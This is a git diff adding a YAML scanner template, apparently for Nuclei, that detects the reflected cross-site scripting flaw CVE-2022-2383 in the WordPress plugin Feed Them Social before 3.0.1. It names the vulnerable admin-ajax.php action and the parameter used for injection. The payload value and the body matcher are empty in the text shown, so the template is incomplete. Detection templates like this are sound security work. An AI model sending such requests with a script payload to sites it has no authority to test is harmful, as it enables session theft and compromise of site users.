diff --git a/cves/2022/CVE-2022-2383.yaml b/cves/2022/CVE-2022-2383.yaml new file mode 100644 index 0000000000..027da7cff5 --- /dev/null +++ b/cves/2022/CVE-2022-2383.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-2383 + +info: + name: Feed Them Social < 3.0.1 - Cross-Site Scripting + author: akincibor + severity: medium + description: | + The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2383 + classification: + cve-id: CVE-2022-2383 + metadata: + verified: true + tags: xss,wp,wordpress,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '
' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200